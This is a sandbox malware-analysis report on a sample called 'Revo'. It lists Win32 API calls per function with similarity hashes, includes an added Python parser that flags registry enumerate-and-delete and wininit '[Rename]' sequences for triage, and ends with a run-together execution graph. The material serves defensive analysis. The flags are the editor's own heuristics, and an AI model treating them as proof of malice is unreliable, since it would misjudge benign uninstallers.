• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
• SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045A9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
• GlobalFree.KERNEL32(00000000), ref: 00406450
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
  • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
  • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
• String ID: %ls=%ls$[Rename]
• API String ID: 2171350718-461813615
• Opcode ID: 4099efde17faabea8ca23ed937e5d9f442c3975f0fb2967c08604eca1be790f2
• Instruction ID: 026d517b253a5d6ccbe57f845948a58d3e37c3b70aabf831ebb2f23b3e620644
• Opcode Fuzzy Hash: 4099efde17faabea8ca23ed937e5d9f442c3975f0fb2967c08604eca1be790f2
• Instruction Fuzzy Hash: 14312370600315BBD2207F659D49F6B3A6CDF41759F12403AFA02F62D3EA7C982986BD
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 004046A5
• GetSysColor.USER32(00000000), ref: 004046E3
• SetTextColor.GDI32(?,00000000), ref: 004046EF
• SetBkMode.GDI32(?,?), ref: 004046FB
• GetSysColor.USER32(?), ref: 0040470E
• SetBkColor.GDI32(?,?), ref: 0040471E
• DeleteObject.GDI32(?), ref: 00404738
• CreateBrushIndirect.GDI32(?), ref: 00404742
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
• Instruction ID: dc9e33635e48260261a40037ac820fc698cd45b4c1bae75aa0874807b7806060
• Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
• Instruction Fuzzy Hash: B321A7715007049BCB309F38DA48B5B7BF4AF82714B00893DE9A6B72E0D778E904CB58
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FF7
• GetMessagePos.USER32 ref: 00404FFF
• ScreenToClient.USER32(?,?), ref: 00405019
• SendMessageW.USER32(?,00001111,00000000,?), ref: 0040502B
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405051
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                              • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                              • Instruction ID: 35c53ee3dfde216a4a17f9e8076a2c946c4c65f0c866826bb74e9a6ab3448864
                                                                                                                                              • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                              • Instruction Fuzzy Hash: F3015E31900218BADB00DBA4DD85BFFBBBCEF55711F10412BBA51B61D0D7B49A058BA4
APIs
• GetDC.USER32(?), ref: 00401E76
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
• ReleaseDC.USER32(?,00000000), ref: 00401EA9
• CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Tahoma
• API String ID: 3808545654-3580928618
• Opcode ID: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
• Instruction ID: 75d1d1a794b0a88cdf1cba10915d0c929158808af8533b27f0e618500a238d04
• Opcode Fuzzy Hash: e7f7f24e504178032ddcf332a7fccd4deaa03fd5eea84bddf963d4e06575246e
• Instruction Fuzzy Hash: 5C01D475900260FFEB005BB5AD0DBDD7FB0AB29300F50C83AF542B61E2CAB904448B2D
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
• CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
• CharNextW.USER32(?,004BD000,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
• CharPrevW.USER32(?,?,76F93420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
• Opcode ID: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
• Instruction ID: ee050b90af12f7da754e5e1a7cefda923f304df8a209a79dab08f9ec4fc7f4f9
• Opcode Fuzzy Hash: 7c4491ab095b24fecdd0000f8ec6f0e383ca7ce11269c465865605e120ff5cd6
• Instruction Fuzzy Hash: 0311B695800612A5DB303B148D40AB7A2F8AF55794F52403FED9AB3AC1EB7C4C9286BD
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
• Opcode ID: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
• Instruction ID: 5e325e4eb8c599eaadb2b1545cb8ec7488c9788084a271734582f96bfbf33a22
• Opcode Fuzzy Hash: acaf4fc398a66893391ff6439948fdf9f5bbe1b70c5a8b97b274ab2e0b988985
• Instruction Fuzzy Hash: FA213D7150010ABFEF129F90CE89EEF7B7DEB54388F110076B909B11E0D7759E54AA64
APIs
• IsWindowVisible.USER32(?), ref: 004056CA
• CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
  • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
• Instruction ID: 4a72d77d5ba7db911775b8fd6e8698557fa8fe3088d7b3c11d294ca78c68b4d0
• Opcode Fuzzy Hash: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
• Instruction Fuzzy Hash: 6801B131100708EFDB204F90DDC0A9B3665FB80750F504036F605761D1D77A8C91EE2D
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
• CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
• lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
Memory Dump Source
• Source File: 00000000.00000002.2160395865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2160353062.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160432819.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000040E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000041E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160475270.000000000045B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160739486.0000000000579000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Revo.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
• Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
• Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
• Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99
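The function summaries above are easier to triage by machine than by eye. The parser below is an added example by the editor, not part of the Joe Sandbox report. It reads blocks in the format shown (an "APIs" header, bullet lines of the form `Api.MODULE(args), ref: ADDRESS`, and the API ID / String ID under "Similarity") and applies two triage rules that are the editor's own, not Joe Sandbox signatures: a function that both enumerates and deletes registry keys (the shape of the block at 00402F22 above), and a function whose arguments reference `[Rename]`, which the editor reads as the wininit.ini section used to schedule file renames for the next boot. SAMPLE is a constructed excerpt copied from three blocks on this page; the ApiCall and FunctionSummary types and the flag names are assumptions of this example.

```python
"""Parse Joe Sandbox IDA-plugin function summaries and flag API sequences
worth a closer look.

Added example, not part of the Joe Sandbox report or of the analysed sample.
SAMPLE is a constructed excerpt copied from three function blocks on this
page; the triage rules are the editor's own assumptions about which Win32
call sequences deserve attention, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# Report format as it appears on the page: each function starts with an
# 'APIs' header, followed by bullet lines
#   • Api.MODULE(args), ref: ADDRESS
# and a 'Similarity' section carrying the plugin's API ID / String ID.
SAMPLE = """\
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
• CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
• lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
APIs
• GetDC.USER32(?), ref: 00401E76
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
• ReleaseDC.USER32(?,00000000), ref: 00401EA9
• CreateFontIndirectW.GDI32(0041E5F8), ref: 00401EF8
Similarity
• API ID: CapsCreateDeviceFontIndirectRelease
• String ID: Tahoma
"""

# The argument list is optional: the page also prints calls without one,
# e.g. "GetMessagePos.USER32 ref: 00404FFF".
API_LINE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
ID_LINE = re.compile(r"^•\s*(?P<key>API ID|String ID):\s*(?P<val>.*?)\s*$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int  # address of the call site, from the 'ref:' field


@dataclass
class FunctionSummary:
    calls: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""

    @property
    def address(self) -> Optional[int]:
        """First call-site address; used as the function's identifier."""
        return self.calls[0].ref if self.calls else None


def parse_summaries(text: str) -> list:
    """Split report text into one FunctionSummary per 'APIs' block."""
    funcs = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            funcs.append(FunctionSummary())
            continue
        if not funcs:
            continue  # text before the first block has nothing to attach to
        m = API_LINE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            funcs[-1].calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
            continue
        m = ID_LINE.match(line)
        if m and m["key"] == "API ID":
            funcs[-1].api_id = m["val"]
        elif m and m["key"] == "String ID":
            funcs[-1].string_id = m["val"]
    return funcs


def triage(fn: FunctionSummary) -> list:
    """Editor's triage rules (assumptions, not Joe Sandbox signatures)."""
    names = {c.api for c in fn.calls}
    flags = []
    # Enumerate-then-delete on registry keys is the shape of a recursive key
    # wipe: expected in an uninstaller, but the same primitive removes
    # persistence or policy keys, so the address is worth recording.
    if names & {"RegEnumKeyW", "RegEnumKeyExW"} and names & {"RegDeleteKeyW", "RegDeleteKeyExW"}:
        flags.append("recursive-registry-delete")
    # '[Rename]' is read here as the wininit.ini section that schedules file
    # renames for the next boot, i.e. a delayed file replacement.
    if any("[Rename]" in a for c in fn.calls for a in c.args):
        flags.append("wininit-rename")
    return flags


def report(text: str) -> list:
    """(address, API ID, flags) for every block that has at least one call."""
    return [(f"{fn.address:08X}", fn.api_id, triage(fn))
            for fn in parse_summaries(text) if fn.address is not None]


if __name__ == "__main__":
    for addr, api_id, flags in report(SAMPLE):
        print(f"{addr}  {api_id:40s}  {', '.join(flags) or '-'}")
```

Run against a whole saved report, the same parser turns several hundred blocks into a short list of addresses to open in the disassembler; the two rules here are only the ones this page's blocks illustrate, and the `names & {...}` test is where further call-sequence rules would go.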

Execution Graph

Execution Coverage: 10.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.2%
Total number of Nodes: 1505
Total number of Limit Nodes: 46

execution_graph
24885 2f162f 26 API calls std::bad_exception::bad_exception
24887 2fb51b 99 API calls 3 library calls
23193 2e9c34
23194 2e9c47
23193->23194
23200 2e9c40
23193->23200
23195 2e9c4d GetStdHandle
23194->23195
23197 2e9c58
23194->23197
23195->23197
23196 2e9cad WriteFile
23196->23197
23197->23196
23198 2e9c7d WriteFile
23197->23198
23199 2e9c78
23197->23199
23197->23200
23202 2e9d20
23197->23202
23204 2e6c55 60 API calls
23197->23204
23198->23197
23198->23199
23199->23197
23199->23198
23205 2e6e9b 75 API calls
23202->23205
23204->23197
23205->23200
24862 2f9135 10 API calls
24888 2ff230 51 API calls 2 library calls
23357 2ee708
23358 2ee718
23357->23358
23359 2ee710 FreeLibrary
23357->23359
23359->23358
24865 304d18 QueryPerformanceFrequency QueryPerformanceCounter
24827 2f9404 GdipCloneImage GdipAlloc
24867 30191d 48 API calls
23361 30861f
23369 309aa7
23361->23369
23365 30863b
23366 308648
23365->23366
23377 30864b 11 API calls
23365->23377
23368 308633
23370 309990 _abort 5 API calls
23369->23370
23371 309ace
23370->23371
23372 309ae6 TlsAlloc
23371->23372
23375 309ad7
23371->23375
23372->23375
23373 2fe203 DloadUnlock 5 API calls
23374 308629
23373->23374
23374->23368
23376 30859a 20 API calls 2 library calls
23374->23376
23375->23365
23376->23365
23377->23368
23378 2fd200
23380 2fd1ae
23378->23380
23379 2fd53a ___delayLoadHelper2@8 19 API calls
23380->23379
23379->23380
24829 2e1019 29 API calls pre_c_initialization
24830 30940d 21 API calls
24891 2e7a13 GetCurrentProcess GetLastError CloseHandle
24831 306c73 52 API calls 3 library calls
24834 2fe07f 27 API calls pre_c_initialization
24893 30de64 51 API calls
24928 2f877b CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte
23207 306f6d
23218 30a7b3
23207->23218
23213 307a50 _free 20 API calls
23214 306fbf
23213->23214
23215 306f95
23216
307a50 _free 20 API calls 23215->23216 23217 306f8a 23216->23217 23217->23213 23219 30a7bc 23218->23219 23220 306f7f 23218->23220 23235 30a6b2 23219->23235 23222 30aba6 GetEnvironmentStringsW 23220->23222 23223 30abbd 23222->23223 23233 30ac10 23222->23233 23226 30abc3 WideCharToMultiByte 23223->23226 23224 306f84 23224->23217 23234 306fc5 26 API calls 3 library calls 23224->23234 23225 30ac19 FreeEnvironmentStringsW 23225->23224 23227 30abdf 23226->23227 23226->23233 23228 307a8a __onexit 21 API calls 23227->23228 23229 30abe5 23228->23229 23230 30ac02 23229->23230 23231 30abec WideCharToMultiByte 23229->23231 23232 307a50 _free 20 API calls 23230->23232 23231->23230 23232->23233 23233->23224 23233->23225 23234->23215 23236 308516 _abort 38 API calls 23235->23236 23237 30a6bf 23236->23237 23255 30a7d1 23237->23255 23239 30a6c7 23264 30a446 23239->23264 23242 30a6de 23242->23220 23243 307a8a __onexit 21 API calls 23244 30a6ef 23243->23244 23254 30a721 23244->23254 23271 30a873 23244->23271 23247 307a50 _free 20 API calls 23247->23242 23248 30a739 23251 30a765 23248->23251 23252 307a50 _free 20 API calls 23248->23252 23249 30a71c 23281 307ecc 20 API calls _abort 23249->23281 23251->23254 23282 30a31c 26 API calls 23251->23282 23252->23251 23254->23247 23256 30a7dd ___scrt_is_nonwritable_in_current_image 23255->23256 23257 308516 _abort 38 API calls 23256->23257 23258 30a7e7 23257->23258 23262 30a86b ___scrt_is_nonwritable_in_current_image 23258->23262 23263 307a50 _free 20 API calls 23258->23263 23283 307ad8 38 API calls _abort 23258->23283 23284 309931 EnterCriticalSection 23258->23284 23285 30a862 LeaveCriticalSection _abort 23258->23285 23262->23239 23263->23258 23265 303356 __cftof 38 API calls 23264->23265 23266 30a458 23265->23266 23267 30a467 GetOEMCP 23266->23267 23268 30a479 23266->23268 23270 30a490 23267->23270 23269 30a47e GetACP 23268->23269 23268->23270 23269->23270 23270->23242 23270->23243 23272 30a446 40 API calls 23271->23272 23273 30a892 
23272->23273 23274 30a899 23273->23274 23277 30a8e3 IsValidCodePage 23273->23277 23280 30a908 ___scrt_get_show_window_mode 23273->23280 23275 2fe203 DloadUnlock 5 API calls 23274->23275 23276 30a714 23275->23276 23276->23248 23276->23249 23277->23274 23278 30a8f5 GetCPInfo 23277->23278 23278->23274 23278->23280 23286 30a51e GetCPInfo 23280->23286 23281->23254 23282->23254 23284->23258 23285->23258 23288 30a558 23286->23288 23295 30a602 23286->23295 23296 30b5ea 23288->23296 23290 2fe203 DloadUnlock 5 API calls 23292 30a6ae 23290->23292 23292->23274 23294 3097c2 __vswprintf_c_l 43 API calls 23294->23295 23295->23290 23297 303356 __cftof 38 API calls 23296->23297 23298 30b60a MultiByteToWideChar 23297->23298 23300 30b648 23298->23300 23307 30b6e0 23298->23307 23302 307a8a __onexit 21 API calls 23300->23302 23308 30b669 __vsnwprintf_l ___scrt_get_show_window_mode 23300->23308 23301 2fe203 DloadUnlock 5 API calls 23303 30a5b9 23301->23303 23302->23308 23310 3097c2 23303->23310 23304 30b6da 23315 30980d 20 API calls _free 23304->23315 23306 30b6ae MultiByteToWideChar 23306->23304 23309 30b6ca GetStringTypeW 23306->23309 23307->23301 23308->23304 23308->23306 23309->23304 23311 303356 __cftof 38 API calls 23310->23311 23312 3097d5 23311->23312 23316 3095a5 23312->23316 23315->23307 23318 3095c0 __vswprintf_c_l 23316->23318 23317 3095e6 MultiByteToWideChar 23319 309610 23317->23319 23320 30979a 23317->23320 23318->23317 23325 307a8a __onexit 21 API calls 23319->23325 23327 309631 __vsnwprintf_l 23319->23327 23321 2fe203 DloadUnlock 5 API calls 23320->23321 23322 3097ad 23321->23322 23322->23294 23323 3096e6 23352 30980d 20 API calls _free 23323->23352 23324 30967a MultiByteToWideChar 23324->23323 23326 309693 23324->23326 23325->23327 23343 309c64 23326->23343 23327->23323 23327->23324 23331 3096f5 23333 307a8a __onexit 21 API calls 23331->23333 23337 309716 __vsnwprintf_l 23331->23337 23332 3096bd 23332->23323 23334 309c64 __vswprintf_c_l 11 API calls 23332->23334 
23333->23337 23334->23323 23335 30978b 23351 30980d 20 API calls _free 23335->23351 23337->23335 23338 309c64 __vswprintf_c_l 11 API calls 23337->23338 23339 30976a 23338->23339 23339->23335 23340 309779 WideCharToMultiByte 23339->23340 23340->23335 23341 3097b9 23340->23341 23353 30980d 20 API calls _free 23341->23353 23344 309990 _abort 5 API calls 23343->23344 23345 309c8b 23344->23345 23347 309c94 23345->23347 23354 309cec 10 API calls 3 library calls 23345->23354 23349 2fe203 DloadUnlock 5 API calls 23347->23349 23348 309cd4 LCMapStringW 23348->23347 23350 3096aa 23349->23350 23350->23323 23350->23331 23350->23332 23351->23323 23352->23320 23353->23323 23354->23348 24895 2fce71 19 API calls ___delayLoadHelper2@8 24931 30ab56 GetCommandLineA GetCommandLineW 24932 2e5f46 80 API calls 24897 309e43 27 API calls 3 library calls 23382 2fbb5b 23383 2fbb64 GetTempPathW 23382->23383 23400 2fb51b _wcsrchr 23382->23400 23388 2fbb84 23383->23388 23385 2e3e41 _swprintf 51 API calls 23385->23388 23386 2fc0c4 23387 2e9e6b 4 API calls 23387->23388 23388->23385 23388->23387 23389 2fbbbb SetDlgItemTextW 23388->23389 23393 2fbbd9 _wcschr 23389->23393 23389->23400 23391 2fb808 SetWindowTextW 23391->23400 23395 2fbcc5 EndDialog 23393->23395 23393->23400 23395->23400 23396 302b5e 22 API calls 23396->23400 23398 2fb5f9 SetFileAttributesW 23401 2fb6b4 GetFileAttributesW 23398->23401 23411 2fb5ec ___scrt_get_show_window_mode 23398->23411 23400->23386 23400->23391 23400->23396 23400->23411 23413 2f1410 CompareStringW 23400->23413 23414 2f95f8 GetCurrentDirectoryW 23400->23414 23415 2ea215 7 API calls 23400->23415 23418 2ea19e FindClose 23400->23418 23419 2fa2ae 76 API calls ___std_exception_copy 23400->23419 23420 2fa156 ExpandEnvironmentStringsW 23400->23420 23403 2fb6c2 DeleteFileW 23401->23403 23401->23411 23403->23411 23405 2fb9d2 GetDlgItem SetWindowTextW SendMessageW 23405->23411 23406 2e3e41 _swprintf 51 API calls 23408 2fb6f7 GetFileAttributesW 23406->23408 23407 2fba14 
